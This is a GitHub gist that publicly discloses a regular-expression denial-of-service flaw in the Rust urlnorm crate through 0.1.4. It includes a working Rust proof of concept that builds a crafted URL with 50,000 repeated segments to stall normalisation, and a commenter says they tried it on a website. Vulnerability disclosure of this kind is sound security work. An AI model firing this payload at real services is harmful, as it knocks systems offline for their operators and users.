Skip to content

Instantly share code, notes, and snippets.

@6en6ar
Created June 20, 2023 22:39
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save 6en6ar/b118888dc739e8979038f24c8ac33611 to your computer and use it in GitHub Desktop.
Save 6en6ar/b118888dc739e8979038f24c8ac33611 to your computer and use it in GitHub Desktop.
Public disclosure of vulnerability inside the urlnorm crate through 0.1.4 for Rust
Regex Denial of service in urlnorm package on https://crates.io/crates/urlnorm
The urlnorm crate through 0.1.4 for Rust allows Regular Expression Denial of Service (ReDos) via a crafted URL to lib.rs.
The regex defined on line 37. in https://github.com/progscrape/urlnorm/blob/main/src/lib.rs used for trimming .html and other
extensions when normalizing the url is vulnerable to a Regex Denial of Service when malicious input is provided.
Poc Code:
'''
use url::Url;
use urlnorm::UrlNormalizer;
use std::{time::{Duration, Instant}};
fn main() {
println!("[ + ] Testing urlnorm package");
let x = std::iter::repeat("A5.html").take(50000).collect::<String>().to_owned();
let norm = UrlNormalizer::default();
let mut url_input ="https://goooooooogle.com/hello/index.html/".to_owned();
url_input.push_str(x.as_str());
url_input.push_str("\x00");
let url = Url::parse(&url_input).unwrap();
println!("{:?}",url);
let start = Instant::now();
let normalized = norm.compute_normalization_string(&url);
//let normalized = norm.normalize_host(&url).unwrap();
println!("[ + ] Url -> {:?}", normalized);
let end = start.elapsed();
println!("[ + ] Time elapsed {:?}", end);
}
'''
@TouchstoneTheDev
Copy link

Is this vuln patched by dev ?
I tried on website I got "Error: PersistError(UnexpectedError("Storage fetch panicked"))"

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment